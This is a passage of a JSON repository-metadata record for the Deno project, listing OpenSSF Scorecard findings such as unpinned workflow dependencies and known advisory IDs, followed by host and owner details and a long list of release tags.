https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno